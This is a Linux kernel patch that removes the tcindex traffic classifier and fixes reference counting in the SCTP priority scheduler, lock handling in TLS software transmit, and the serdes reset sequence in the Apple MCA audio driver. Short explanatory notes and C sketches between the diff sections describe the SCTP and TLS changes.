+-	return tcf_exts_has_actions(&r->exts) || r->res.classid;
+-}
+-
+-static void tcindex_data_get(struct tcindex_data *p)
+-{
+-	refcount_inc(&p->refcnt);
+-}
+-
+-static void tcindex_data_put(struct tcindex_data *p)
+-{
+-	if (refcount_dec_and_test(&p->refcnt)) {
+-		kfree(p->perfect);
+-		kfree(p->h);
+-		kfree(p);
+-	}
+-}
+-
+-static struct tcindex_filter_result *tcindex_lookup(struct tcindex_data *p,
+-						    u16 key)
+-{
+-	if (p->perfect) {
+-		struct tcindex_filter_result *f = p->perfect + key;
+-
+-		return tcindex_filter_is_set(f) ? f : NULL;
+-	} else if (p->h) {
+-		struct tcindex_filter __rcu **fp;
+-		struct tcindex_filter *f;
+-
+-		fp = &p->h[key % p->hash];
+-		for (f = rcu_dereference_bh_rtnl(*fp);
+-		     f;
+-		     fp = &f->next, f = rcu_dereference_bh_rtnl(*fp))
+-			if (f->key == key)
+-				return &f->result;
+-	}
+-
+-	return NULL;
+-}
+-
+-
+-static int tcindex_classify(struct sk_buff *skb, const struct tcf_proto *tp,
+-			    struct tcf_result *res)
+-{
+-	struct tcindex_data *p = rcu_dereference_bh(tp->root);
+-	struct tcindex_filter_result *f;
+-	int key = (skb->tc_index & p->mask) >> p->shift;
+-
+-	pr_debug("tcindex_classify(skb %p,tp %p,res %p),p %p\n",
+-		 skb, tp, res, p);
+-
+-	f = tcindex_lookup(p, key);
+-	if (!f) {
+-		struct Qdisc *q = tcf_block_q(tp->chain->block);
+-
+-		if (!p->fall_through)
+-			return -1;
+-		res->classid = TC_H_MAKE(TC_H_MAJ(q->handle), key);
+-		res->class = 0;
+-		pr_debug("alg 0x%x\n", res->classid);
+-		return 0;
+-	}
+-	*res = f->res;
+-	pr_debug("map 0x%x\n", res->classid);
+-
+-	return tcf_exts_exec(skb, &f->exts, res);
+-}
+-
+-
+-static void *tcindex_get(struct tcf_proto *tp, u32 handle)
+-{
+-	struct tcindex_data *p = rtnl_dereference(tp->root);
+-	struct tcindex_filter_result *r;
+-
+-	pr_debug("tcindex_get(tp %p,handle 0x%08x)\n", tp, handle);
+-	if (p->perfect && handle >= p->alloc_hash)
+-		return NULL;
+-	r = tcindex_lookup(p, handle);
+-	return r && tcindex_filter_is_set(r) ? r : NULL;
+-}
+-
+-static int tcindex_init(struct tcf_proto *tp)
+-{
+-	struct tcindex_data *p;
+-
+-	pr_debug("tcindex_init(tp %p)\n", tp);
+-	p = kzalloc(sizeof(struct tcindex_data), GFP_KERNEL);
+-	if (!p)
+-		return -ENOMEM;
+-
+-	p->mask = 0xffff;
+-	p->hash = DEFAULT_HASH_SIZE;
+-	p->fall_through = 1;
+-	refcount_set(&p->refcnt, 1); /* Paired with tcindex_destroy_work() */
+-
+-	rcu_assign_pointer(tp->root, p);
+-	return 0;
+-}
+-
+-static void __tcindex_destroy_rexts(struct tcindex_filter_result *r)
+-{
+-	tcf_exts_destroy(&r->exts);
+-	tcf_exts_put_net(&r->exts);
+-	tcindex_data_put(r->p);
+-}
+-
+-static void tcindex_destroy_rexts_work(struct work_struct *work)
+-{
+-	struct tcindex_filter_result *r;
+-
+-	r = container_of(to_rcu_work(work),
+-			 struct tcindex_filter_result,
+-			 rwork);
+-	rtnl_lock();
+-	__tcindex_destroy_rexts(r);
+-	rtnl_unlock();
+-}
+-
+-static void __tcindex_destroy_fexts(struct tcindex_filter *f)
+-{
+-	tcf_exts_destroy(&f->result.exts);
+-	tcf_exts_put_net(&f->result.exts);
+-	kfree(f);
+-}
+-
+-static void tcindex_destroy_fexts_work(struct work_struct *work)
+-{
+-	struct tcindex_filter *f = container_of(to_rcu_work(work),
+-						struct tcindex_filter,
+-						rwork);
+-
+-	rtnl_lock();
+-	__tcindex_destroy_fexts(f);
+-	rtnl_unlock();
+-}
+-
+-static int tcindex_delete(struct tcf_proto *tp, void *arg, bool *last,
+-			  bool rtnl_held, struct netlink_ext_ack *extack)
+-{
+-	struct tcindex_data *p = rtnl_dereference(tp->root);
+-	struct tcindex_filter_result *r = arg;
+-	struct tcindex_filter __rcu **walk;
+-	struct tcindex_filter *f = NULL;
+-
+-	pr_debug("tcindex_delete(tp %p,arg %p),p %p\n", tp, arg, p);
+-	if (p->perfect) {
+-		if (!r->res.class)
+-			return -ENOENT;
+-	} else {
+-		int i;
+-
+-		for (i = 0; i < p->hash; i++) {
+-			walk = p->h + i;
+-			for (f = rtnl_dereference(*walk); f;
+-			     walk = &f->next, f = rtnl_dereference(*walk)) {
+-				if (&f->result == r)
+-					goto found;
+-			}
+-		}
+-		return -ENOENT;
+-
+-found:
+-		rcu_assign_pointer(*walk, rtnl_dereference(f->next));
+-	}
+-	tcf_unbind_filter(tp, &r->res);
+-	/* all classifiers are required to call tcf_exts_destroy() after rcu
+-	 * grace period, since converted-to-rcu actions are relying on that
+-	 * in cleanup() callback
+-	 */
+-	if (f) {
+-		if (tcf_exts_get_net(&f->result.exts))
+-			tcf_queue_work(&f->rwork, tcindex_destroy_fexts_work);
+-		else
+-			__tcindex_destroy_fexts(f);
+-	} else {
+-		tcindex_data_get(p);
+-
+-		if (tcf_exts_get_net(&r->exts))
+-			tcf_queue_work(&r->rwork, tcindex_destroy_rexts_work);
+-		else
+-			__tcindex_destroy_rexts(r);
+-	}
+-
+-	*last = false;
+-	return 0;
+-}
+-
+-static void tcindex_destroy_work(struct work_struct *work)
+-{
+-	struct tcindex_data *p = container_of(to_rcu_work(work),
+-					      struct tcindex_data,
+-					      rwork);
+-
+-	tcindex_data_put(p);
+-}
+-
+-static inline int
+-valid_perfect_hash(struct tcindex_data *p)
+-{
+-	return  p->hash > (p->mask >> p->shift);
+-}
+-
+-static const struct nla_policy tcindex_policy[TCA_TCINDEX_MAX + 1] = {
+-	[TCA_TCINDEX_HASH]		= { .type = NLA_U32 },
+-	[TCA_TCINDEX_MASK]		= { .type = NLA_U16 },
+-	[TCA_TCINDEX_SHIFT]		= { .type = NLA_U32 },
+-	[TCA_TCINDEX_FALL_THROUGH]	= { .type = NLA_U32 },
+-	[TCA_TCINDEX_CLASSID]		= { .type = NLA_U32 },
+-};
+-
+-static int tcindex_filter_result_init(struct tcindex_filter_result *r,
+-				      struct tcindex_data *p,
+-				      struct net *net)
+-{
+-	memset(r, 0, sizeof(*r));
+-	r->p = p;
+-	return tcf_exts_init(&r->exts, net, TCA_TCINDEX_ACT,
+-			     TCA_TCINDEX_POLICE);
+-}
+-
+-static void tcindex_free_perfect_hash(struct tcindex_data *cp);
+-
+-static void tcindex_partial_destroy_work(struct work_struct *work)
+-{
+-	struct tcindex_data *p = container_of(to_rcu_work(work),
+-					      struct tcindex_data,
+-					      rwork);
+-
+-	rtnl_lock();
+-	if (p->perfect)
+-		tcindex_free_perfect_hash(p);
+-	kfree(p);
+-	rtnl_unlock();
+-}
+-
+-static void tcindex_free_perfect_hash(struct tcindex_data *cp)
+-{
+-	int i;
+-
+-	for (i = 0; i < cp->hash; i++)
+-		tcf_exts_destroy(&cp->perfect[i].exts);
+-	kfree(cp->perfect);
+-}
+-
+-static int tcindex_alloc_perfect_hash(struct net *net, struct tcindex_data *cp)
+-{
+-	int i, err = 0;
+-
+-	cp->perfect = kcalloc(cp->hash, sizeof(struct tcindex_filter_result),
+-			      GFP_KERNEL | __GFP_NOWARN);
+-	if (!cp->perfect)
+-		return -ENOMEM;
+-
+-	for (i = 0; i < cp->hash; i++) {
+-		err = tcf_exts_init(&cp->perfect[i].exts, net,
+-				    TCA_TCINDEX_ACT, TCA_TCINDEX_POLICE);
+-		if (err < 0)
+-			goto errout;
+-		cp->perfect[i].p = cp;
+-	}
+-
+-	return 0;
+-
+-errout:
+-	tcindex_free_perfect_hash(cp);
+-	return err;
+-}
+-
+-static int
+-tcindex_set_parms(struct net *net, struct tcf_proto *tp, unsigned long base,
+-		  u32 handle, struct tcindex_data *p,
+-		  struct tcindex_filter_result *r, struct nlattr **tb,
+-		  struct nlattr *est, u32 flags, struct netlink_ext_ack *extack)
+-{
+-	struct tcindex_filter_result new_filter_result;
+-	struct tcindex_data *cp = NULL, *oldp;
+-	struct tcindex_filter *f = NULL; /* make gcc behave */
+-	struct tcf_result cr = {};
+-	int err, balloc = 0;
+-	struct tcf_exts e;
+-	bool update_h = false;
+-
+-	err = tcf_exts_init(&e, net, TCA_TCINDEX_ACT, TCA_TCINDEX_POLICE);
+-	if (err < 0)
+-		return err;
+-	err = tcf_exts_validate(net, tp, tb, est, &e, flags, extack);
+-	if (err < 0)
+-		goto errout;
+-
+-	err = -ENOMEM;
+-	/* tcindex_data attributes must look atomic to classifier/lookup so
+-	 * allocate new tcindex data and RCU assign it onto root. Keeping
+-	 * perfect hash and hash pointers from old data.
+-	 */
+-	cp = kzalloc(sizeof(*cp), GFP_KERNEL);
+-	if (!cp)
+-		goto errout;
+-
+-	cp->mask = p->mask;
+-	cp->shift = p->shift;
+-	cp->hash = p->hash;
+-	cp->alloc_hash = p->alloc_hash;
+-	cp->fall_through = p->fall_through;
+-	cp->tp = tp;
+-	refcount_set(&cp->refcnt, 1); /* Paired with tcindex_destroy_work() */
+-
+-	if (tb[TCA_TCINDEX_HASH])
+-		cp->hash = nla_get_u32(tb[TCA_TCINDEX_HASH]);
+-
+-	if (tb[TCA_TCINDEX_MASK])
+-		cp->mask = nla_get_u16(tb[TCA_TCINDEX_MASK]);
+-
+-	if (tb[TCA_TCINDEX_SHIFT]) {
+-		cp->shift = nla_get_u32(tb[TCA_TCINDEX_SHIFT]);
+-		if (cp->shift > 16) {
+-			err = -EINVAL;
+-			goto errout;
+-		}
+-	}
+-	if (!cp->hash) {
+-		/* Hash not specified, use perfect hash if the upper limit
+-		 * of the hashing index is below the threshold.
+-		 */
+-		if ((cp->mask >> cp->shift) < PERFECT_HASH_THRESHOLD)
+-			cp->hash = (cp->mask >> cp->shift) + 1;
+-		else
+-			cp->hash = DEFAULT_HASH_SIZE;
+-	}
+-
+-	if (p->perfect) {
+-		int i;
+-
+-		if (tcindex_alloc_perfect_hash(net, cp) < 0)
+-			goto errout;
+-		cp->alloc_hash = cp->hash;
+-		for (i = 0; i < min(cp->hash, p->hash); i++)
+-			cp->perfect[i].res = p->perfect[i].res;
+-		balloc = 1;
+-	}
+-	cp->h = p->h;
+-
+-	err = tcindex_filter_result_init(&new_filter_result, cp, net);
+-	if (err < 0)
+-		goto errout_alloc;
+-	if (r)
+-		cr = r->res;
+-
+-	err = -EBUSY;
+-
+-	/* Hash already allocated, make sure that we still meet the
+-	 * requirements for the allocated hash.
+-	 */
+-	if (cp->perfect) {
+-		if (!valid_perfect_hash(cp) ||
+-		    cp->hash > cp->alloc_hash)
+-			goto errout_alloc;
+-	} else if (cp->h && cp->hash != cp->alloc_hash) {
+-		goto errout_alloc;
+-	}
+-
+-	err = -EINVAL;
+-	if (tb[TCA_TCINDEX_FALL_THROUGH])
+-		cp->fall_through = nla_get_u32(tb[TCA_TCINDEX_FALL_THROUGH]);
+-
+-	if (!cp->perfect && !cp->h)
+-		cp->alloc_hash = cp->hash;
+-
+-	/* Note: this could be as restrictive as if (handle & ~(mask >> shift))
+-	 * but then, we'd fail handles that may become valid after some future
+-	 * mask change. While this is extremely unlikely to ever matter,
+-	 * the check below is safer (and also more backwards-compatible).
+-	 */
+-	if (cp->perfect || valid_perfect_hash(cp))
+-		if (handle >= cp->alloc_hash)
+-			goto errout_alloc;
+-
+-
+-	err = -ENOMEM;
+-	if (!cp->perfect && !cp->h) {
+-		if (valid_perfect_hash(cp)) {
+-			if (tcindex_alloc_perfect_hash(net, cp) < 0)
+-				goto errout_alloc;
+-			balloc = 1;
+-		} else {
+-			struct tcindex_filter __rcu **hash;
+-
+-			hash = kcalloc(cp->hash,
+-				       sizeof(struct tcindex_filter *),
+-				       GFP_KERNEL);
+-
+-			if (!hash)
+-				goto errout_alloc;
+-
+-			cp->h = hash;
+-			balloc = 2;
+-		}
+-	}
+-
+-	if (cp->perfect) {
+-		r = cp->perfect + handle;
+-	} else {
+-		/* imperfect area is updated in-place using rcu */
+-		update_h = !!tcindex_lookup(cp, handle);
+-		r = &new_filter_result;
+-	}
+-
+-	if (r == &new_filter_result) {
+-		f = kzalloc(sizeof(*f), GFP_KERNEL);
+-		if (!f)
+-			goto errout_alloc;
+-		f->key = handle;
+-		f->next = NULL;
+-		err = tcindex_filter_result_init(&f->result, cp, net);
+-		if (err < 0) {
+-			kfree(f);
+-			goto errout_alloc;
+-		}
+-	}
+-
+-	if (tb[TCA_TCINDEX_CLASSID]) {
+-		cr.classid = nla_get_u32(tb[TCA_TCINDEX_CLASSID]);
+-		tcf_bind_filter(tp, &cr, base);
+-	}
+-
+-	oldp = p;
+-	r->res = cr;
+-	tcf_exts_change(&r->exts, &e);
+-
+-	rcu_assign_pointer(tp->root, cp);
+-
+-	if (update_h) {
+-		struct tcindex_filter __rcu **fp;
+-		struct tcindex_filter *cf;
+-
+-		f->result.res = r->res;
+-		tcf_exts_change(&f->result.exts, &r->exts);
+-
+-		/* imperfect area bucket */
+-		fp = cp->h + (handle % cp->hash);
+-
+-		/* lookup the filter, guaranteed to exist */
+-		for (cf = rcu_dereference_bh_rtnl(*fp); cf;
+-		     fp = &cf->next, cf = rcu_dereference_bh_rtnl(*fp))
+-			if (cf->key == (u16)handle)
+-				break;
+-
+-		f->next = cf->next;
+-
+-		cf = rcu_replace_pointer(*fp, f, 1);
+-		tcf_exts_get_net(&cf->result.exts);
+-		tcf_queue_work(&cf->rwork, tcindex_destroy_fexts_work);
+-	} else if (r == &new_filter_result) {
+-		struct tcindex_filter *nfp;
+-		struct tcindex_filter __rcu **fp;
+-
+-		f->result.res = r->res;
+-		tcf_exts_change(&f->result.exts, &r->exts);
+-
+-		fp = cp->h + (handle % cp->hash);
+-		for (nfp = rtnl_dereference(*fp);
+-		     nfp;
+-		     fp = &nfp->next, nfp = rtnl_dereference(*fp))
+-				; /* nothing */
+-
+-		rcu_assign_pointer(*fp, f);
+-	} else {
+-		tcf_exts_destroy(&new_filter_result.exts);
+-	}
+-
+-	if (oldp)
+-		tcf_queue_work(&oldp->rwork, tcindex_partial_destroy_work);
+-	return 0;
+-
+-errout_alloc:
+-	if (balloc == 1)
+-		tcindex_free_perfect_hash(cp);
+-	else if (balloc == 2)
+-		kfree(cp->h);
+-	tcf_exts_destroy(&new_filter_result.exts);
+-errout:
+-	kfree(cp);
+-	tcf_exts_destroy(&e);
+-	return err;
+-}
+-
+-static int
+-tcindex_change(struct net *net, struct sk_buff *in_skb,
+-	       struct tcf_proto *tp, unsigned long base, u32 handle,
+-	       struct nlattr **tca, void **arg, u32 flags,
+-	       struct netlink_ext_ack *extack)
+-{
+-	struct nlattr *opt = tca[TCA_OPTIONS];
+-	struct nlattr *tb[TCA_TCINDEX_MAX + 1];
+-	struct tcindex_data *p = rtnl_dereference(tp->root);
+-	struct tcindex_filter_result *r = *arg;
+-	int err;
+-
+-	pr_debug("tcindex_change(tp %p,handle 0x%08x,tca %p,arg %p),opt %p,"
+-	    "p %p,r %p,*arg %p\n",
+-	    tp, handle, tca, arg, opt, p, r, *arg);
+-
+-	if (!opt)
+-		return 0;
+-
+-	err = nla_parse_nested_deprecated(tb, TCA_TCINDEX_MAX, opt,
+-					  tcindex_policy, NULL);
+-	if (err < 0)
+-		return err;
+-
+-	return tcindex_set_parms(net, tp, base, handle, p, r, tb,
+-				 tca[TCA_RATE], flags, extack);
+-}
+-
+-static void tcindex_walk(struct tcf_proto *tp, struct tcf_walker *walker,
+-			 bool rtnl_held)
+-{
+-	struct tcindex_data *p = rtnl_dereference(tp->root);
+-	struct tcindex_filter *f, *next;
+-	int i;
+-
+-	pr_debug("tcindex_walk(tp %p,walker %p),p %p\n", tp, walker, p);
+-	if (p->perfect) {
+-		for (i = 0; i < p->hash; i++) {
+-			if (!p->perfect[i].res.class)
+-				continue;
+-			if (!tc_cls_stats_dump(tp, walker, p->perfect + i))
+-				return;
+-		}
+-	}
+-	if (!p->h)
+-		return;
+-	for (i = 0; i < p->hash; i++) {
+-		for (f = rtnl_dereference(p->h[i]); f; f = next) {
+-			next = rtnl_dereference(f->next);
+-			if (!tc_cls_stats_dump(tp, walker, &f->result))
+-				return;
+-		}
+-	}
+-}
+-
+-static void tcindex_destroy(struct tcf_proto *tp, bool rtnl_held,
+-			    struct netlink_ext_ack *extack)
+-{
+-	struct tcindex_data *p = rtnl_dereference(tp->root);
+-	int i;
+-
+-	pr_debug("tcindex_destroy(tp %p),p %p\n", tp, p);
+-
+-	if (p->perfect) {
+-		for (i = 0; i < p->hash; i++) {
+-			struct tcindex_filter_result *r = p->perfect + i;
+-
+-			/* tcf_queue_work() does not guarantee the ordering we
+-			 * want, so we have to take this refcnt temporarily to
+-			 * ensure 'p' is freed after all tcindex_filter_result
+-			 * here. Imperfect hash does not need this, because it
+-			 * uses linked lists rather than an array.
+-			 */
+-			tcindex_data_get(p);
+-
+-			tcf_unbind_filter(tp, &r->res);
+-			if (tcf_exts_get_net(&r->exts))
+-				tcf_queue_work(&r->rwork,
+-					       tcindex_destroy_rexts_work);
+-			else
+-				__tcindex_destroy_rexts(r);
+-		}
+-	}
+-
+-	for (i = 0; p->h && i < p->hash; i++) {
+-		struct tcindex_filter *f, *next;
+-		bool last;
+-
+-		for (f = rtnl_dereference(p->h[i]); f; f = next) {
+-			next = rtnl_dereference(f->next);
+-			tcindex_delete(tp, &f->result, &last, rtnl_held, NULL);
+-		}
+-	}
+-
+-	tcf_queue_work(&p->rwork, tcindex_destroy_work);
+-}
+-
+-
+-static int tcindex_dump(struct net *net, struct tcf_proto *tp, void *fh,
+-			struct sk_buff *skb, struct tcmsg *t, bool rtnl_held)
+-{
+-	struct tcindex_data *p = rtnl_dereference(tp->root);
+-	struct tcindex_filter_result *r = fh;
+-	struct nlattr *nest;
+-
+-	pr_debug("tcindex_dump(tp %p,fh %p,skb %p,t %p),p %p,r %p\n",
+-		 tp, fh, skb, t, p, r);
+-	pr_debug("p->perfect %p p->h %p\n", p->perfect, p->h);
+-
+-	nest = nla_nest_start_noflag(skb, TCA_OPTIONS);
+-	if (nest == NULL)
+-		goto nla_put_failure;
+-
+-	if (!fh) {
+-		t->tcm_handle = ~0; /* whatever ... */
+-		if (nla_put_u32(skb, TCA_TCINDEX_HASH, p->hash) ||
+-		    nla_put_u16(skb, TCA_TCINDEX_MASK, p->mask) ||
+-		    nla_put_u32(skb, TCA_TCINDEX_SHIFT, p->shift) ||
+-		    nla_put_u32(skb, TCA_TCINDEX_FALL_THROUGH, p->fall_through))
+-			goto nla_put_failure;
+-		nla_nest_end(skb, nest);
+-	} else {
+-		if (p->perfect) {
+-			t->tcm_handle = r - p->perfect;
+-		} else {
+-			struct tcindex_filter *f;
+-			struct tcindex_filter __rcu **fp;
+-			int i;
+-
+-			t->tcm_handle = 0;
+-			for (i = 0; !t->tcm_handle && i < p->hash; i++) {
+-				fp = &p->h[i];
+-				for (f = rtnl_dereference(*fp);
+-				     !t->tcm_handle && f;
+-				     fp = &f->next, f = rtnl_dereference(*fp)) {
+-					if (&f->result == r)
+-						t->tcm_handle = f->key;
+-				}
+-			}
+-		}
+-		pr_debug("handle = %d\n", t->tcm_handle);
+-		if (r->res.class &&
+-		    nla_put_u32(skb, TCA_TCINDEX_CLASSID, r->res.classid))
+-			goto nla_put_failure;
+-
+-		if (tcf_exts_dump(skb, &r->exts) < 0)
+-			goto nla_put_failure;
+-		nla_nest_end(skb, nest);
+-
+-		if (tcf_exts_dump_stats(skb, &r->exts) < 0)
+-			goto nla_put_failure;
+-	}
+-
+-	return skb->len;
+-
+-nla_put_failure:
+-	nla_nest_cancel(skb, nest);
+-	return -1;
+-}
+-
+-static void tcindex_bind_class(void *fh, u32 classid, unsigned long cl,
+-			       void *q, unsigned long base)
+-{
+-	struct tcindex_filter_result *r = fh;
+-
+-	tc_cls_bind_class(classid, cl, q, &r->res, base);
+-}
+-
+-static struct tcf_proto_ops cls_tcindex_ops __read_mostly = {
+-	.kind		=	"tcindex",
+-	.classify	=	tcindex_classify,
+-	.init		=	tcindex_init,
+-	.destroy	=	tcindex_destroy,
+-	.get		=	tcindex_get,
+-	.change		=	tcindex_change,
+-	.delete		=	tcindex_delete,
+-	.walk		=	tcindex_walk,
+-	.dump		=	tcindex_dump,
+-	.bind_class	=	tcindex_bind_class,
+-	.owner		=	THIS_MODULE,
+-};
+-
+-static int __init init_tcindex(void)
+-{
+-	return register_tcf_proto_ops(&cls_tcindex_ops);
+-}
+-
+-static void __exit exit_tcindex(void)
+-{
+-	unregister_tcf_proto_ops(&cls_tcindex_ops);
+-}
+-
+-module_init(init_tcindex)
+-module_exit(exit_tcindex)
+-MODULE_LICENSE("GPL");
+diff --git a/net/sctp/stream_sched_prio.c b/net/sctp/stream_sched_prio.c
+index 4fc9f2923ed11..7dd9f8b387cca 100644
+--- a/net/sctp/stream_sched_prio.c
++++ b/net/sctp/stream_sched_prio.c
+@@ -25,6 +25,18 @@
+ 
+ static void sctp_sched_prio_unsched_all(struct sctp_stream *stream);
+ 
++static struct sctp_stream_priorities *sctp_sched_prio_head_get(struct sctp_stream_priorities *p)
++{
++	p->users++;
++	return p;
++}
++
++static void sctp_sched_prio_head_put(struct sctp_stream_priorities *p)
++{
++	if (p && --p->users == 0)
++		kfree(p);
++}
++
+ static struct sctp_stream_priorities *sctp_sched_prio_new_head(
+ 			struct sctp_stream *stream, int prio, gfp_t gfp)
+ {
+@@ -38,6 +50,7 @@ static struct sctp_stream_priorities *sctp_sched_prio_new_head(
+ 	INIT_LIST_HEAD(&p->active);
+ 	p->next = NULL;
+ 	p->prio = prio;
++	p->users = 1;
+ 
+ 	return p;
+ }
+@@ -53,7 +66,7 @@ static struct sctp_stream_priorities *sctp_sched_prio_get_head(
+ 	 */
+ 	list_for_each_entry(p, &stream->prio_list, prio_sched) {
+ 		if (p->prio == prio)
+-			return p;
++			return sctp_sched_prio_head_get(p);
+ 		if (p->prio > prio)
+ 			break;
+ 	}
+@@ -70,7 +83,7 @@ static struct sctp_stream_priorities *sctp_sched_prio_get_head(
+ 			 */
+ 			break;
+ 		if (p->prio == prio)
+-			return p;
++			return sctp_sched_prio_head_get(p);
+ 	}
+ 
+ 	/* If not even there, allocate a new one. */
+@@ -154,32 +167,21 @@ static int sctp_sched_prio_set(struct sctp_stream *stream, __u16 sid,
+ 	struct sctp_stream_out_ext *soute = sout->ext;
+ 	struct sctp_stream_priorities *prio_head, *old;
+ 	bool reschedule = false;
+-	int i;
++
++	old = soute->prio_head;
++	if (old && old->prio == prio)
++		return 0;
+ 
+ 	prio_head = sctp_sched_prio_get_head(stream, prio, gfp);
+ 	if (!prio_head)
+ 		return -ENOMEM;
+ 
+ 	reschedule = sctp_sched_prio_unsched(soute);
+-	old = soute->prio_head;
+ 	soute->prio_head = prio_head;
+ 	if (reschedule)
+ 		sctp_sched_prio_sched(stream, soute);
+ 
+-	if (!old)
+-		/* Happens when we set the priority for the first time */
+-		return 0;
+-
+-	for (i = 0; i < stream->outcnt; i++) {
+-		soute = SCTP_SO(stream, i)->ext;
+-		if (soute && soute->prio_head == old)
+-			/* It's still in use, nothing else to do here. */
+-			return 0;
+-	}
+-
+-	/* No hits, we are good to free it. */
+-	kfree(old);
+-
++	sctp_sched_prio_head_put(old);
+ 	return 0;
+ }
+ 
+@@ -206,20 +208,8 @@ static int sctp_sched_prio_init_sid(struct sctp_stream *stream, __u16 sid,
+ 
+ static void sctp_sched_prio_free_sid(struct sctp_stream *stream, __u16 sid)
+ {
+-	struct sctp_stream_priorities *prio = SCTP_SO(stream, sid)->ext->prio_head;
+-	int i;
+-
+-	if (!prio)
+-		return;
+-
++	sctp_sched_prio_head_put(SCTP_SO(stream, sid)->ext->prio_head);
+ 	SCTP_SO(stream, sid)->ext->prio_head = NULL;
+-	for (i = 0; i < stream->outcnt; i++) {
+-		if (SCTP_SO(stream, i)->ext &&
+-		    SCTP_SO(stream, i)->ext->prio_head == prio)
+-			return;
+-	}
+-
+-	kfree(prio);
+ }
+ 
+ static void sctp_sched_prio_free(struct sctp_stream *stream)
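
The SCTP scheduler fix swaps an O(streams) liveness scan for a plain reference count on the shared priority head: get on attach, put on detach, free at zero. A minimal sketch of the pattern:

    #include <stdlib.h>

    struct prio_head { int prio; int users; };

    static struct prio_head *head_get(struct prio_head *p)
    {
        p->users++;
        return p;
    }

    static void head_put(struct prio_head *p)
    {
        if (p && --p->users == 0)
            free(p); /* last user frees; no global scan needed */
    }

    int main(void)
    {
        struct prio_head *p = malloc(sizeof(*p));

        if (!p)
            return 1;
        p->users = 1;  /* creator's reference */
        head_get(p);   /* a second stream attaches */
        head_put(p);   /* one detaches: still alive */
        head_put(p);   /* last put frees */
        return 0;
    }
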
+diff --git a/net/tls/tls_sw.c b/net/tls/tls_sw.c
+index a83d2b4275fa6..38dcd9b401027 100644
+--- a/net/tls/tls_sw.c
++++ b/net/tls/tls_sw.c
+@@ -941,7 +941,9 @@ int tls_sw_sendmsg(struct sock *sk, struct msghdr *msg, size_t size)
+ 			       MSG_CMSG_COMPAT))
+ 		return -EOPNOTSUPP;
+ 
+-	mutex_lock(&tls_ctx->tx_lock);
++	ret = mutex_lock_interruptible(&tls_ctx->tx_lock);
++	if (ret)
++		return ret;
+ 	lock_sock(sk);
+ 
+ 	if (unlikely(msg->msg_controllen)) {
+@@ -1275,7 +1277,9 @@ int tls_sw_sendpage(struct sock *sk, struct page *page,
+ 		      MSG_SENDPAGE_NOTLAST | MSG_SENDPAGE_NOPOLICY))
+ 		return -EOPNOTSUPP;
+ 
+-	mutex_lock(&tls_ctx->tx_lock);
++	ret = mutex_lock_interruptible(&tls_ctx->tx_lock);
++	if (ret)
++		return ret;
+ 	lock_sock(sk);
+ 	ret = tls_sw_do_sendpage(sk, page, offset, size, flags);
+ 	release_sock(sk);
+@@ -2416,11 +2420,19 @@ static void tx_work_handler(struct work_struct *work)
+ 
+ 	if (!test_and_clear_bit(BIT_TX_SCHEDULED, &ctx->tx_bitmask))
+ 		return;
+-	mutex_lock(&tls_ctx->tx_lock);
+-	lock_sock(sk);
+-	tls_tx_records(sk, -1);
+-	release_sock(sk);
+-	mutex_unlock(&tls_ctx->tx_lock);
++
++	if (mutex_trylock(&tls_ctx->tx_lock)) {
++		lock_sock(sk);
++		tls_tx_records(sk, -1);
++		release_sock(sk);
++		mutex_unlock(&tls_ctx->tx_lock);
++	} else if (!test_and_set_bit(BIT_TX_SCHEDULED, &ctx->tx_bitmask)) {
++		/* Someone is holding the tx_lock, they will likely run Tx
++		 * and cancel the work on their way out of the lock section.
++		 * Schedule a long delay just in case.
++		 */
++		schedule_delayed_work(&ctx->tx_work.work, msecs_to_jiffies(10));
++	}
+ }
+ 
+ static bool tls_is_tx_ready(struct tls_sw_context_tx *ctx)
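
Two related changes here: senders take tx_lock interruptibly so a signal can break them out, and the deferred tx worker only trylocks, because whoever holds the lock will flush pending records on the way out; if contended, the worker simply re-arms with a delay as a backstop. A pthread sketch of the worker side, with placeholder helpers:

    #include <pthread.h>
    #include <stdio.h>

    static pthread_mutex_t tx_lock = PTHREAD_MUTEX_INITIALIZER;

    static void reschedule_work(int ms) { printf("re-arm in %d ms\n", ms); }
    static void flush_tx_records(void)  { puts("flushing"); }

    static void tx_work_handler(void)
    {
        if (pthread_mutex_trylock(&tx_lock) == 0) {
            flush_tx_records();
            pthread_mutex_unlock(&tx_lock);
        } else {
            /* the holder will flush on unlock; delay is a backstop */
            reschedule_work(10);
        }
    }

    int main(void)
    {
        tx_work_handler();
        return 0;
    }
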
+diff --git a/sound/soc/apple/mca.c b/sound/soc/apple/mca.c
+index 24381c42eb54c..64750db9b9639 100644
+--- a/sound/soc/apple/mca.c
++++ b/sound/soc/apple/mca.c
+@@ -101,7 +101,6 @@
+ #define SERDES_CONF_UNK3	BIT(14)
+ #define SERDES_CONF_NO_DATA_FEEDBACK	BIT(15)
+ #define SERDES_CONF_SYNC_SEL	GENMASK(18, 16)
+-#define SERDES_CONF_SOME_RST	BIT(19)
+ #define REG_TX_SERDES_BITSTART	0x08
+ #define REG_RX_SERDES_BITSTART	0x0c
+ #define REG_TX_SERDES_SLOTMASK	0x0c
+@@ -203,15 +202,24 @@ static void mca_fe_early_trigger(struct snd_pcm_substream *substream, int cmd,
+ 	case SNDRV_PCM_TRIGGER_START:
+ 	case SNDRV_PCM_TRIGGER_RESUME:
+ 	case SNDRV_PCM_TRIGGER_PAUSE_RELEASE:
++		mca_modify(cl, serdes_conf, SERDES_CONF_SYNC_SEL,
++			   FIELD_PREP(SERDES_CONF_SYNC_SEL, 0));
++		mca_modify(cl, serdes_conf, SERDES_CONF_SYNC_SEL,
++			   FIELD_PREP(SERDES_CONF_SYNC_SEL, 7));
+ 		mca_modify(cl, serdes_unit + REG_SERDES_STATUS,
+ 			   SERDES_STATUS_EN | SERDES_STATUS_RST,
+ 			   SERDES_STATUS_RST);
+-		mca_modify(cl, serdes_conf, SERDES_CONF_SOME_RST,
+-			   SERDES_CONF_SOME_RST);
+-		readl_relaxed(cl->base + serdes_conf);
+-		mca_modify(cl, serdes_conf, SERDES_STATUS_RST, 0);
+-		WARN_ON(readl_relaxed(cl->base + REG_SERDES_STATUS) &
++		/*
++		 * Experiments suggest that it takes at most ~1 us
++		 * for the bit to clear, so wait 2 us for good measure.
++		 */
++		udelay(2);
++		WARN_ON(readl_relaxed(cl->base + serdes_unit + REG_SERDES_STATUS) &
+ 			SERDES_STATUS_RST);
++		mca_modify(cl, serdes_conf, SERDES_CONF_SYNC_SEL,
++			   FIELD_PREP(SERDES_CONF_SYNC_SEL, 0));
++		mca_modify(cl, serdes_conf, SERDES_CONF_SYNC_SEL,
++			   FIELD_PREP(SERDES_CONF_SYNC_SEL, cl->no + 1));
+ 		break;
